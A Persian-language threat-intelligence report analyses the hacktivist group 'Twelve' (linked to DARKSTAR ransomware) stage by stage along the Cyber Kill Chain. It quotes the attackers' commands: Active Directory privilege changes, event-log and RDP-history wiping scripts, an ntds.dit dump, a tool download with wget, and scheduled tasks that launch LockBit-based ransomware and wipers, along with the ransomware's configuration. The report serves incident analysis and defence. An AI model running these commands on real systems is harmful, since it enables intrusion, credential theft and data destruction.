دوازده، برگشته است!

30 مهر 1403 دوازده، برگشته است!

روابط عمومی شرکت ایدکو (توزیع‌کننده‌ی محصولات کسپرسکی در ایران)؛  بهار 2024، پست‌هایی با داده‌های واقعی افراد شروع به ظاهر شدن روی کانال تلگرامی «دوازده» کرد. خیلی زود این کانال به دلیل نقض قوانین سرویس تلگرام مسدود شد. این گروه چندین ماه بدون اینکه توجه‌ها را به خود جلب کند باقی ماند اما پی بردیم که از همان تکنیک‌های دوازده استفاده کرده و به سرورهای C2 مرتبط با این عامل تهدید متکی بوده. از این رو مطمئنیم این گروه همچنان فعال است و شاید بزودی دوباره شروع به فعالیت کند. در این مقاله قصد داریم از متودولوژی زنجیره‌ کشتار سایبری (Cyber Kill Chain) برای تحلیل اقدامات مهاجمین استفاده کنیم. با ما همراه باشید.

در مورد «دوازده»

این گروه آوریل 2023 در بطن درگیری روسیه و اوکراین شکل گرفت و از آن زمان به سازمان‌های دولت روسیه حمله کرد. این نشان می‌دهد هدف اصلی آن وارد کردن هر چه بیشتر آسیب است. موقع حمله، این گروه هدفش رسیدن به دارایی‌های مهم است اما همیشه هم در این امر موفق نمی‌شود. افزون بر این، دوازده از سیستم‌های قربانی اطلاعات حساس استخراج کرده و آن را روی کانال تلگرام نشر می‌کند. جالب اینجاست که دوازده، زیرساخت، ابزارها و تکنیک‌ها (TTPها) را با گروه باج‌افزاری DARKSTAR که پیشتر با نام  Shadow یا COMET معروف بود به اشتراک می‌گذارد. این نشان می‌دهد هر دو به یک سندیکا یا خوشه فعلیت متعلق هستند. در عین حال، گرچه اقدامات دوازده واضحاً ماهیتی هکتیویستی دارد اما DARKSTAR به الگوی کلاسیک اخاذی دوگانه پایبند است. این تنوع اهداف در سندیکا بر پیچیدگی و تنوع تهدیدهای سایبری مدرن تاکید می‌کند.

زنجیره کشتار سایبری: مرحله اولیه

مرحله اولیه قوانین نجیره کشتار سایبری به فازهای ابتدایی یک حمله سایبری با هددف دسترسی به LAN سازمان هدف اشاره دارد. این فازها شامل دامنه‌ای از اقدامات تاکتیکی می‌شوند: از عملیات شناسایی خارجی گرفته تا فرض کنترل سیستم‌های داخل شبکه محافظت‌شده.

عملیات شناسایی

گرچه دقیق نمی‌دانیم عامل تهدید از چه تکنیک‌های عملیات شناسایی استفاده می‌کند اما ظن‌مان بر این است که آن‌ها آدرس‌های آی‌پی روسیه را بر اساس ژئوتگ‌ها اسکن کرده و سعی دارند سرورهای وی‌پی‌ان و اپ‌هایی را که از اینترنت قابل‌دسترسی‌اند شناسایی کنند؛ اپ‌هایی که می‌توانند در قالب نقاط ورودی در زیرساخت سازمان تارگت یا کنتراکتور استفاده شوند.

توسعه منابع

حین تحلیل حملات سایبری، پی بردیم عامل تهدید منحصراً به ابزارهای شناخته‌شده با دسترسی آزاد متکی بوده است. ابزارهایی که این گروه اغلب استفاده می‌کند عبارتند از Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner و PsExec.

دسترسی و تحویل اولیه

در بیشتر حملاتی که از آن‌ها خبر داریم، دشمن با اکانت‌های معتبر لوکال یا دامنه، وی‌پی‌ان یا گواهی‌های SSH به زیرساخت قربانی دسترسی اولیه پیدا کرد. بعد از دسترسی به زیرساخت قربانی، مهاجمین برای حرکت جانبی از پروتکل دسکتاپ ریموت (RDP) استفاده کردند. بیشتر وقت‌ها، مهاجمین با برخی کنتراکتورهای قربانی به زیرساخت تارگت نفوذ کردند. برای انجام این کار آن‌ها به زیرساخت کنتراکتور دسترسی پیدا کرده و بعد از گواهی آن برای وصل شدن به وی‌پی‌ان مشتری‌اش استفاده کردند. دشمن با دسترسی به آن می‌تواند به سیستم‌های مشتری با RDP وصل شده و به زیرساخت مشتری نفوذ کند.

اکسپلویت

وب‌شل‌ها

ما با تحلیل سرورهای وب که مهاجمین دستکاری‌شان کرده بودند تعداد زیادی وب‌شل کشف کردیم. مسیرهای یافت‌شده چنین شکلی داشتند:

/home/bitrix/ext_www/[REDACTED]/assets/images/

/home/bitrix/ext_www/[REDACTED]/bitrix/templates/.default/ajax/images/

/home/bitrix/ext_www/[REDACTED]/bitrix/admin/

همه‌ی وب شل‌ها به زبان PHP نوشته شده بودند و نام‌های رندوم داشتند:

 

F6d098f417.php, 3425b29f4e.php, ecb2979be7.php, 04116e895b.php, 7784ba76e2.php,

a4daa72a70.php, 5146d22914.php, 001d7a.php, 8759c7.php, 48a08b.php, 6f99ac.php,

82f5f4.php, 0dd37d.php, 6bceb2.php, d0af43.php

 

آن‌ها می‌توانند اهداف مختلفی داشته باشند: برخی دستورات دلخواه را اجرا برخی دیگر فایل‌ها را جابه‌جا می‌کردند و برخی دیگر ایجاد و ارسال ایمیل داشتند. شایان ذکر است که اکثر وب‌شل‌های مورد استفاده توسط عوامل تهدید، ابزارهای در دسترس عموم هستند که می توانند در منابع در دسترس عموم یافت شوند. در اینجا دو نمونه وجود دارد:

 

https://github[.]com/stefanpejcic/wordpress-malware؛

https://github[.]com/tennc/webshell/blob/master/php/wso/wso2.php.

 

ما از مثال یک ریمیلر (اسکریپت برای ارسال ایمیل) برای بررسی نحوه عملکرد وب‌شل‌ها استفاده می‌کنیم. مهاجمین از این اسکریپت PHP برای ارسال پیام‌های ایمیل استفاده کردند. این با بررسی داده‌های مورد نیاز، مانند آدرس گیرنده، موضوع و متن پیام در یک درخواست POST شروع می‌شود. اگر هر یک از داده‌های کلیدی گم شده باشد، اسکریپت یک خطا را گزارش می‌کند و خارج می‌شود. پس از بررسی موفقیت آمیز و آماده سازی اجزای ایمیل، از تابع () PHP برای ارسال ایمیل استفاده می‌کند.

بک‌در FaceFish

رخدادی که ما بررسی کردیم مربوط به بک‌در FaceFish بود که با کمک یک وب‌شل نصب‌شده روی سرور VMware vCenter با سوء استفاده از آسیب پذیری‌های CVE-2021-21972 و CVE-2021-22005 در پلت فرم مجازی‌سازی vSphere بارگذاری شد. آسیب‌پذیری اول را می‌توان در کلاینت پلتفرم یافت. این امکان اجرای کد از راه دور را می‌دهد اما دومی یک آسیب‌پذیری دلخواه بارگذاری فایل در سرور است. مانند بسیاری از پوسته های وب مورد استفاده توسط گروه، این مورد نیز به صورت عمومی در دسترس است.

https://github[.]com/NS-Sp4ce/CVE-2021-21972/tree/main/payload/Linux

در مسیر زیر در سیستم آلوده قرار داشت:

/usr/lib/vmware-vsphere-ui/server/static/resources/libs/shell.jsp

 

پس از شروع، FaceFish یک کتابخانه مشترک libs.so را در سیستم ذخیره می‌کند، آن را با روش ld.so.preload به فرآیند sshd تزریق و سرویس SSH را مجدداً راه‌اندازی می‌کند.

ماندگاری

برای سفت کردن جای پایش در زیرساخت دامنه، دشمن از پاورشل برای افزودن کاربران و گروه‌های دامنه و تغییر ACL (لیست‌های کنترل دسترسی) برای اشیاء Active Directory استفاده کرد. در زیر لیستی از دستورات PowerShell که آنها اجرا کرده‌اند آمده است.

Add-DomainGroupMember -Identity [REDACTED] -Members 'EXCHANGE WINDOWS PERMISSIONS'

Add-DomainGroupMember -Identity [REDACTED] -Members 'Organization Management'

Add-DomainGroupMember -Identity [REDACTED] -Members "EXCHANGE WINDOWS PERMISSIONS"

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "users" -PrincipalIdentity "engineers"

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "users"

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "userasdasdasds"

Set-DomainObject -Credential $Cred -Identity [REDACTED]-SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

 

مهاجمین همچنین حساب‌های دامنه و گروه‌های کاربری را با ابزار سیستم net.exe اضافه کردند.

net user [REDACTED] engineers /domain /add

net group [REDACTED] engineers /domain /add

net group engineers [REDACTED] /domain /add

net group engineers 'EXCHANGE WINDOWS PERMISSIONS' /add /domain

net group 'engineers' 'EXCHANGE WINDOWS PERMISSIONS' /add /domain

net group engineers /domain

net group users /domain

net group "Domain Administrators" [REDACTED] /add /domain

افزون بر این، سعی کردند بدافزار را از طریق زمان‌بندی‌گرِ تسک و خط‌مشی‌های دستکاری‌شده گروه جهت ذخیره تسک‌های آلوده برای کل دامنه توزیع و اجرا کنند.

دور زدن لایه‌های دفاعی

برای جلوگیری از شناسایی، مهاجمین هویت بدافزارها و تسک‌های خود را زیر نام‌های محصولات یا سرویس‌های موجود پنهان کردند.

C:\Windows\System32\Tasks\run

C:\Windows\System32\Tasks\Update Microsoft

C:\Windows\System32\Tasks\Yandex

C:\Windows\System32\Tasks\YandexUpdate

C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe

 

آنها همچنین از طیف وسیعی از تکنیک‌ها برای پنهان کردن آثار فعالیت خود استفاده کردند. به طور خاص، آنها گزارش‌های رویداد را با ابزار سیستم wevtutil.exe در انواع مختلف پوسته فرمان پاک کردند.

powershell-command wevtutil el|Foreach-Object{Write-Host Clearing$_;wevtutil cl$_

C:\Windows\system32\cmd.EXE" /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO

wevtutil.exe cl "%1

 

افزون بر این، مهاجمین از اسکریپتی که تاریخچه کانکشن RDP را پاک کرد برای از بین بردن آثار استفاده از RDPشان، داکیومنت‌های اخیر و فهرست فایل‌های اجراشده استفاده کردند.

@echo off

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

attrib -s -h %userprofile%\documents\Default.rdp

del %userprofile%\documents\Default.rdp

del /f /s /q /a %AppData%\Microsoft\Windows\Recent\AutomaticDestinations

reg delete "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU" /va /f

فرمان وکنترل

در یکی از حملات این گروه، ما ردپایی از چارچوب Cobalt Strike را کشف کردیم که مهاجمین از آن برای تماس با C2 خود و توزیع بارهای مخرب استفاده می‌کردند. ابزار را در مسیر زیر پیدا کردیم:

\users\{username}\pictures\photos_delo\loop.exe

دشمن همچنین از ابزارهای سیستم curl و wget برای ارائه ابزارهای مختلف به میزبان‌های در معرض خطر استفاده کرد.

wget https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

curl https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

زنجیره کشتار سایبری: میانه راه

مرحله میانی از نظر زنجیره کشتار سایبری یکپارچه به اقدامات دشمن در یک شبکه هدف قبلاً در معرض خطر اطلاق می شود که هدف آن دسترسی به سیستم‌ها و داده های بیشتری است که مهاجم برای دستیابی به اهداف خود به آنها نیاز دارد. این مرحله شامل یک سری مراحل طراحی‌شده برای انتشار در سراسر شبکه و دسترسی به دارایی‌های حیاتی می‌شود.

انحراف مسیر

دشمن از ngrok برای تونل کردن ترافیک استفاده کرد. آنها آن ابزار را بلافاصله پس از اتصال به سیستم نصب کردند و پورت 3389 ( پورت استاندارد RDP) را در فایل پیکربندی تنظیم کردند. پس از آن، تمام اتصالات نامشروع به سیستم از طریق RDP از طریق ngrok انجام شد. مهاجمین این ابزار را با دستور زیر به سرویسی به نام svchost متصل کردند:

C:\ProgramData\svchost\svchost.exe service run --config

C:\ProgramData\svchost\svchost.yml

C:\ProgramData\svchost\ یک دایرکتوری بود که توسط مهاجمین ایجاد شد. فایل svchost.exe خود ngrok است، در حالیکه svchost.yml به عنوان فایل پیکربندی آن عمل می‌کند. علاوه بر شماره پورت، حاوی یک نشانه مجوز است که چنین حالتی دارد:

 2YXVHSiK9hhc4aKCbH4i6BLh21J_6zwxt***********. توکن ها بین نمونه ها متفاوت هستند.

مقدار ::::%16777216 در قسمت آدرس شبکه منبع، در گزارش رویداد RDP نشان می‌دهد که مهاجمین اتصالات خود را از طریق ngrok آغاز کرده‌اند.

کشف

دسمن از آی‌پی اسکنر پیشرفته، BloodHound و adPEAS برای شناسایی LAN و زیرساخت دامنه استفاده کرد؛ همینطور برای بررسی ارتباط بین دامنه‌ها. Advanced IP Scanner می‌تواند بسرعت همه دستگاه‌ها را روی شبکه مورد نظر شناسایی کند. BloodHound برای تجزیه و تحلیل و تجسم کاربران و سیستم‌های مورد اعتماد دامنه و شناسایی مسیرهایی با کمترین مقاومت برای افزایش امتیاز استفاده می‌شود. adPEAS برای حمله به Active Directory، شناسایی نقص‌های پیکربندی و شناسایی راه‌هایی برای افزایش امتیازات دامنه استفاده می‌شود. در مجموع، این ابزارها به مهاجمین اجازه می‌دهد تا به طور موثر شبکه‌های محلی قربانیان را بررسی و از آنها سوء استفاده کنند. علاوه بر این، این گروه از cmdlet‌های ماژول PowerView برای کشف حساب‌های کاربری دامنه استفاده کرد.

Get-DomainObject users

Get-ADUsers users

Get-ADUser users

Get-ADUser -Filter * -SearchBase "[REDACTED OU]"

Get-ADUser -Filter * -SearchBase "[REDACTED OU]" | findstr Name

این گروه از پاورشل برای دسترسی به داده‌های گروه‌های دامنه استفاده کرد:

Get-ADGroup

Get-ADGroup "EXCHANGE WINDOWS PERMISSIONS"

Get-ADGroupMember "EXCHANGE WINDOWS PERMISSIONS"

Get-ADGroupMember "engineers"

Get-DomainGroupMember engineers

Get-DomainGroupMember skzi

ارتقای مزیت

برای افزایش امتیازات، دشمن در درجه اول از اعتبار قانونی کاربران با امتیازات دسترسی مدیریتی استفاده می‌کرد. علاوه بر این، آنها از ماژول PowerView برای اصلاح ویژگی‌های حساب‌های جدیدی که برای دستیابی به اهداف خود تنظیم کرده‌اند استفاده کردند:

Add-DomainObjectAcl-Rights'All'

پارامتر -Rights 'All' به حساب کاربری دسترسی کامل به شیء مشخص‌شده را می‌دهد. این ممکن است شامل اجازه خواندن، نوشتن، ایجاد، حذف و انجام عملیات‌های مختلف روی شیء باشد.

اجرا

اسکریپت‌ها و فرمان‌ها

دشمن از مفسرهای سیستم و ابزارهای در دسترس عموم و همچنین اسکریپت‌های bat. و پاورشل خودنوشته برای انجام اقدامات مختلف در سیستم استفاده کرد.

در زیر نمونه‌هایی از اسکریپت‌های حمله را که کشف کردیم آورده شده است:

gpo.ps1

Sophos_kill_local.ps1

Logon.bat

CleanRDPHistory.bat

c:\intel\GPO.bat

\\netlogon\logon.bat

c:\intel\test.ps1

\\netlogon\u.bat

\SYSVOL\domain\scripts\outlookconf2003.ps1

فهرست دستورات اجراشده توسط حریف که در لاگ PowerShell ثبت شده است، نشان می‌دهد که آنها جلسات فعال PowerShell را روی میزبان‌هایی که به آن‌ها حمله کرده‌اند شروع کرده‌اند، و همچنین به فرد ایده‌ای از سطح شایستگی اپراتور می‌دهد.

لیستی از دستوراتی را که مهاجمین در تلاش برای وارد کردن ماژول PowerView اجرا کردند، در زیر مشاهده کنید.

impot .\PowerView.ps1

import .\PowerView.ps1

Import-Module .\PowerView.ps1

cd C:\Users\Public\Documents

Import-Module .\PowerView.ps1

Set-ExecutionPolicy bypass

Import-Module .\PowerView.ps1

 

Sophos_kill_local.ps1

اسکریپتی که ما شناسایی کردیم تلاش می‌کند فرآیندهای Sophos را در رایانه خاتمه دهد و نتایج را در فایل‌های گزارش محلی و راه دور می‌نویسد.

با استفاده از Task Scheduler (درست‌کننده جدول زمانیِ تسک)

برای انجام تمام اقدامات مخرب نهایی، مانند راه‌اندازی باج‌افزار و پاک‌کن‌ها، دشمن از وظایف Scheduler استفاده کرد که با اصلاح سیاست‌های گروه تنظیم شده بود. این امر به دشمن امکان می‌دهد تا این موارد را همزمان روی همه ماشین‌های موجود در دامنه اجرا کند.

نام تسک

خط فرمان

شرح

Dead1

reg:\\REGISTRY\MACHINE\SOF
TWARE\Microsoft\Windows
NT\CurrentVersion\Schedule
\TaskCache\Tasks\{9042DCD8
-***}:Actions”,”cmd.exe
/c
c:\programdata\twelve.exe
-pass ***

اجرای باج‌افزار از طریق CLI و عبور پسورد به عنوان آرگومان

Dead2

reg:\\REGISTRY\MACHINE\SOF
TWARE\Microsoft\Windows
NT\CurrentVersion\Schedule
\TaskCache\Tasks\{AB35C377
-***}:Actions”,”cmd.exe
/c \\[DOMAIN]\netlogon\wiper.
exe”

لانچ وایپر از طریق CLI از اشتراک شبکه نت لاگ

12lock

“reg:\\REGISTRY\MACHINE\SOF
TWARE\Microsoft\Windows
NT\CurrentVersion\Schedule
\TaskCache\Tasks\{A131C020
-***}:Actions”,”powershell
.exe Copy-Item 
\\[DOMAIN]\netlogon\wiper
.exe -Destination
C:\ProgramData

کپی کردن فایل وایپر با PowerShell از اشتراک شبکه netlogon به میزبان لوکال در C:\ProgramData

12lock 1

reg:\\REGISTRY\MACHINE\SOF
TWARE\Microsoft\Windows
NT\CurrentVersion\Schedule
\TaskCache\Tasks\{0B177D41
-***}:Actions","cmd.exe
/
c
\\[DOMAIN]\netlogon\twelve
.exe -pass ***");

اجرای باج‌افزار از اشتراک شبکه نت لاگ از طریق CLI و ارسال رمز عبور به عنوان آرگومان

Copywiper

reg:\\REGISTRY\MACHINE\SOF

TWARE\Microsoft\Windows

NT\CurrentVersion\Schedule

\TaskCache\Tasks\{FB72DE3D

-***}:Actions،"POWERSHELL

EXECopy-Item

\\[DOMAIN]\netlogon\twelv

e.exe-Destination

C:\ProgramData`

کپی کردن فایل باج‌افزار با PowerShell از اشتراک شبکه netlogon به میزبان محلی در C:\ProgramData

run

powershell -ex bypass -f

\\[DOMAIN]\netlogon\outloo

kconf2003.ps1

اجرای یک اسکریپت پاورشل که سیاست‌های گروه را تغییر می‌دهد

YandexUpdate

\\[DOMAIN]\netlogon\12.exe
-pass **************

اجرای باج‌افزار از اشتراک شبکه نت لاگ و ارسال رمز عبور به عنوان آرگومان

Update Microsoft

C:\ProgramData\intel.exe

لانچ وایپر

 

دسترسی به اطلاعات محرمانه

مهاجم برای رسیدن به اطلاعات محرمانه کاربر از mimikatz استفاده کرد. آن‌ها این فایل ابزار را تحت نام calculator.exe پنهان کردند تا هدف اصلی‌اش برملا نشود. با این وجود زحمت تغییر آیکون پیش‌فرض آن را به خود ندادند. مهاجمین از  mimikatz برای راه‌اندازیِ تَلّی از اطلاعات محرمانه‌ی لوکال از مموری پروسه lsass.exe استفاده کردند.

ما مصنوعاتی پیدا کردیم که نشان می‌دهند از mimikatz بر روی میزبان‌های در معرض خطر استفاده شده است، هم در قالب یک فایل اجرایی و هم یک اسکریپت پاورشل.  دشمن علاوه بر تخلیه lsass.exe با mimikatz، اطلاعات محرمانه لوکال را با جمع کردن شاخه‌های رجیستری SYSTEM، SAM و SECURITY با ابزار سیستم reg.exe به دست آورد و آنها را برای بایگانی و حذف بعدی در پوشه Downloads ذخیره کرد. مهاجمین همچنین سعی کردند به اعتبار دامنه دسترسی پیدا کنند. برای انجام این کار، آنها از ابزار سیستم ntdsutil.exe برای تخلیه ntds.dit استفاده کردند. دستوری که ntds.dit را تخلیه می‌کند در زیر نشان داده شده است:

$system32\ntdsutil.exe",""$system32\ntdsutil.exe" "ac i ntds" ifm "create full

c:\temp" q q

 

برای استخراج اعتبار اضافی از سیستم، مهاجمین سپس از نسخه کنسول ابزار All-In-One Password Recovery Pro XenArmor استفاده کردند که می‌تواند بیشتر اعتبار یک کاربر را از hives رجیستری استخراج کند.

دستور جمع آوری داده‌ها با All-In-One Password Recovery Pro در زیر نشان داده شده است:

c:\programdata\update\xenallpasswordpro.exe"  -a

"c:\programdata\update\report.html"

 

حرکت جانبی

برای حرکت در زیرساخت قربانی، دشمن از اطلاعات محرمانه لوکال و دامنه به دست آمده در مراحل قبلی حمله استفاده کرد. در بیشتر موارد، آنها از طریق پروتکل دسکتاپ از راه دور  RDP) ) با استفاده از فایل اجرایی mstsc.exe به دستگاه‌های جدید در شبکه قربانی متصل می‌شوند. آنها گاهی اوقات از PsExec برای حرکت در سراسر شبکه از طریق SMB و از دستور Enter-PSSession برای شروع یک جلسه تعاملی با رایانه‌های راه دور در شبکه استفاده می‌کنند؛ یک ویژگی PowerShell برای مدیریت و اجرای دستورات در سیستم‌های راه دور با کمک ریموت پاورشل.

Enter-PSSession یک سشن موقت تعاملی بین سیستم‌های محلی و راه دور ایجاد می‌کند و به دشمن اجازه می‌دهد تا دستورات PowerShell را مستقیماً بر روی ماشین های راه دور اجرا کند، گویی آنها را به صورت محلی اجرا نموده. فرآیند ارتباط معمولاً از پروتکل WS-Management در بالای HTTP یا HTTPS استفاده می‌کند.

زنجیره کشتار سایبری: مرحله خروج

مرحله خروج از نظر زنجیره کشتار سایبری، اقدامات غایی دشمن را بعد از اینکه با موفقیت به شبکه تارگت نفوذ کرد و به همه سیستم‌ها و داده‌هایی که دنبالش می‌گشتند دسترسی پیدا کرد شرح می‌دهد. این مرحله تمرکزش بر رسیدن به اهداف نهایی حمله است؛ که می‌تواند شامل سرقت داده، خرابکاری یا سایر اقداماتی شود که در نهایت دستکاریِ CIA (محرمانگی، یکپارچگی و موجودیت[1]) دارایی‌های اطلاعاتی قربانی را به همراه دارد.

جمع‌آوری

مهاجم مقادیر قابل توجهی از اطلاعات حساس در مورد قربانیان خود را جمع آوری کرد: اسناد مالی، نقشه‌های فنی، ایمیل شرکتی و غیره. آنها از 7z برای آرشیو داده‌هایی که جمع‌آوری کرده‌اند استفاده و داده‌ها را از طریق سرویس‌های اشتراک‌گذاری کلود ارسال کردند. همچنین در طول حملات خود، دشمن پوشه داده تلگرام tdata) ) را بایگانی و از آن خارج کرد. این پوشه حاوی فایل‌های رسانه‌ای (تصاویر، ویدئو، صدا)، پیام‌ها، استیکرها و اسنادی است که کاربر از طریق تلگرام ارسال یا دریافت کرده است. داده‌ها را می توان برای دسترسی سریع بدون نیاز به بارگیری مجدد فایل ها از سرورها استفاده کرد. پوشه tdata همچنین حاوی فایل‌های سشن است که به برنامه اجازه می‌دهد بدون نیاز به وارد کردن مجدد لاگین و رمز عبور، به برنامه به طور خودکار به حساب متصل شود.

 

دشمنی که به این پوشه دسترسی پیدا می‌کند می‌تواند پیام‌های خصوصی، فایل‌های رسانه‌ای و اسناد را استخراج کند که منجر به درز اطلاعات شخصی یا تجاری حساس می‌شود. فرد شرور می‌تواند از فایل‌های سشن و کلیدهای رمزگذاری برای دور زدن احراز هویت هنگام ورود به حساب تلگرام، خواندن چت‌ها و جعل هویت قربانی هنگام ارسال پیام استفاده کند.

استخراج

حریف آرشیوهای حاوی اطلاعات مورد علاقه خود را از طریق یک مرورگر در https://dropmefiles.net/ آپلود کرد. وقتی هدر صفحه را که زده بود «آپلود موفقیت‌آمیز بود- dropmefiles.net» در کش مرورگر پس از حمله پیدا کردیم متوجه شدیم DropMeFiles همان سرویس اشتراک‌گذاری فایلی بوده که آن‌ها استفاده می‌کردند.

اثر

باج‌افزار

مهاجمین از نسخه‌ای از باج‌افزار محبوب LockBit 3.0 که از کد منبع در دسترس عموم جمع‌آوری شده بود، برای رمزگذاری داده‌ها استفاده کردند. ما فایل های باج افزار را در مسیرهای زیر شناسایی کردیم:

\ProgramData\;

\\netlogon\.

نام فایل‌های زیر در رخدادهای شناخته‌شده مربوط به باج افزار LockBit 3.0 مشخص شده است.

دوازده.exe;

  1. exe;
  2. exe;

enc.exe؛

betta.exe;

sed.exe;

svo.exe.

همانطور که قبلاً در بخش اجرا ذکر شد، باج‌افزار از سیاست‌های گروهی برای گسترش در زیرساخت‌های قربانیان خود استفاده می‌کند. مهاجمن از پاورشل رای انتقال فایل باج‌افزار به اشتراک شبکه netlogon استفاده و سپس یک اسکریپت را برای اصلاح سیاست‌های گروه اجرا کردند.

 

powershell.exe -ex bypass -f C:\Users\Public\gpo.ps1

1

powershell.exe -ex bypass -f C:\Users\Public\gpo.ps1

پس از به‌روزرسانی خط‌مشی‌ها، آن‌ها وظایف برنامه‌ریزی‌شده را در همه رایانه‌های دامنه برای کپی و اجرای باج‌افزار تنظیم کردند.

ابتدا، باج‌افزار از اشتراک شبکه netlogon به فهرست محلی ProgramData توسط وظیفه Copywiper به شرح زیر منتقل شد:

powershell.exe Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData`

1

powershell.exe Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData`

پس از این، آنها باج افزار را از یک پوشه محلی یا اشتراک شبکه از طریق CLI شروع و یک رمز عبور منحصر به فرد را به عنوان آرگومان -pass تعیین کردند:

cmd.exe` /c c:\programdata\twelve.exe -pass ************

1

cmd.exe` /c c:\programdata\twelve.exe -pass ************

الگوریتم باج‌افزار به فایل پیکربندی درون‌سازه‌ای بستگی داد. جدول زیر پیکربندی تروجان مربوطه را نشان می‌دهد که در همه نمونه‌های یافت‌شده از سمت ما یکسان بودند:

پارامتر

معناش

شرح

encrypt_mode

اتوماتیک

حالت رمزگذاری را برای فایل های حجیم تنظیم کنید. این یکی از دو مقدار را می‌گیرد: "خودکار" یا "سریع".

encrypt_filename

درست

رمزگذاری نام فایل

impersonation

غلط

استفاده از حساب‌های فهرست شده در فایل پیکربندی برای افزایش امتیازات

skip_hidden_folders

غلط

عبور از دایرکتوری‌های پنهان

language_check

غلط

چک کردن سیستم داخلی

local_disks

درست

رمزگذاری درایوهای لوکال

network_shares

درست

رمزگذاری دایرکتوری‌های شبکه

kill_processes

درست

پایان پروسه‌ها

kill_processes

درست

توقف سرویس‌ها

running_one

درست

بررسی اینکه فقط یک فرآیند باج افزار در حال اجرا باشد

print_note

غلط

پرینت میزان باج

set_wallpaper

غلط

تغییر تصویر پس‌زمینه دسکتاپ

set_icons

غلط

تغییر آیکون‌های فایل‌های رمزگذاری‌شده

send_report

غلط

ارسال اطلاعات سیستم به C2

self_destruct

درست

از بین بردن خود وقعی که کار انجام شد

kill_defender

درست

توقف ویندوز دیفندر

wipe_freespace

غلط

پر کردن تمام فضای دیسک موجود را با فایل موقت حاوی داده‌های

psexec_netspread

غلط

توزیع در سراسر شبکه با سرویس  PsExec

gpo_netspread

غلط

توزیغ از طریق سیاست‌های گروهی در سراسر شبکه

gpo_ps_update

درست

استفاده از پاورشل برای آپدیت سیاست‌های گروه در همه دامنه‌ها

shutdown_system

غلط

ریستارت سیستم

delete_eventlogs

درست

پاک کردن لاگ‌های سیستم

delete_gpo_delay

0

حذف تعلیقی سیاست گروه. ارزش این پارامتر زمانی به تأخیر انداختن را شرح می‌دهد.

 

قبل از شروع کار، باج‌افزار فرآیندهایی را که ممکن است در رمزگذاری فایل‌های فردی اختلال ایجاد کند، خاتمه می‌دهد. نام فرآیندهایی که باید خاتمه داده شوند در زیر فهرست شده‌اند:

sql

oracle

ocssd

dlsnmp

synctime

agntsvc

isqlplussvc

xfssvccon

mydesktopservice

 

ocautoupds

encsvc

firefox

tbirdconfig

mydesktopqos

ocomm

dbeng50

sqbcoreservice

excel

infopath

msaccess

mspub

onenote

outlook

powerpnt

steam

thebat

thunderbird

visio

winword

wordpad

notepad

calc

wuauclt

onedrive

 

 

جالب اینجاست که پیکربندی برای ایجاد یادداشت باج هیچ گونه تماس یا روشی برای دسترسی به مهاجمین ندارد. یادداشت پایانی فقط از لوگوی گروه تشکیل شده است.همچنین متوجه شدیم که در برخی موارد، مهاجمین از یک تروجان ساخته‌شده از یک سازنده لو رفته برای باج افزار Chaos برای رمزگذاری فایل‌ها استفاده می‌کردند. ما نمونه‌هایی از آن باج افزار را در مسیرهای زیر کشف کردیم:

 

c:\netlogon\enc.exe

c:\Users\User\enc.exe

c:\Windows\System32\config\systemprofile\appdata\roaming\twelve.exe

c:\Windows\sysvol\domain\scripts\enc.exe

موتور Attribution Threat Kaspersky تشخیص میدهد که یکی از این نمونه ها 60٪ شباهت به Chaos دارد. در زمان کشف نمونه‌ها توسط ما، هنوز مشخص نبود دستان پشت پرده رخدادهایی که در آن‌ها این موارد استفاده می‌شدند کیست اما تحلیل ایستا نشان داد کد حاوی خطوط شخصیتی بوده که نمونه‌ها را به گروه دوازده می‌رسانده!

وایپرها

علاوه بر باج افزار، دشمن از برف وایپرها برای از بین بردن زیرساخت‌های قربانیان خود استفاده کرد. آنها معمولاً پس از رمزگذاری فایل ها، وایپرها را اجرا می‌کردند. وایپری پیدا کردیم از کد منبع در دسترس عموم جمع آوری شده بود. وایپر رکورد اصلی بوت  MBR) ) را روی درایوهای متصل بازنویسی می‌کند، بنابراین هنگامی که قربانی دستگاه را روشن می‌کند، پیامی روی صفحه ظاهر شده اما سیستم عامل بارگذاری نمی شود. سپس فایل به صورت بازگشتی از هر دایرکتوری، به جز اطلاعات ویندوز و حجم سیستم، در همه درایوهای نصب شده عبور نموده و برای هر فایل کارهای زیر را انجام می‌دهد:

  • بازنویسی محتویات فایل با بایت‌هایی که به طور تصادفی تولید شده‌اند.
  • بازنویسی ابرداده فایل: بازنشانی اندازه و تنظیم تصادفی تاریخ های ایجاد/تغییر/باز شدن.
  • اختصاص نام تصادفی به فایل و حذف آن

پس از اتمام، فایل مخرب خود را حذف کرده و سیستم را خاموش می‌کند. بعد از تجزیه و تحلیل پویا و استاتیک خود را انجام دادیم، به این نتیجه رسیدیم که نسخه وایپر با نسخه در دسترس عموم یکسان است. همچنین هنگام تحقیق در مورد حملات دوازده، نسخه دیگری از وایپر را کشف کردیم. نمونه با Shamoon یکسان بود، به جز تعدادی از توابع تغییر نام خاص.

در حین بررسی حملات گروه، فایل‌های وایپر را در مسیرهای زیر یافتیم:

\دسکتاپ\;

\ProgramData\;

\\netlogon\.

نام فایل‌های زیر در رخدادهای شناخته شده مربوط به وایپر مشخص شده است:

intel.exe؛

mail.exe;

wiper.exe.

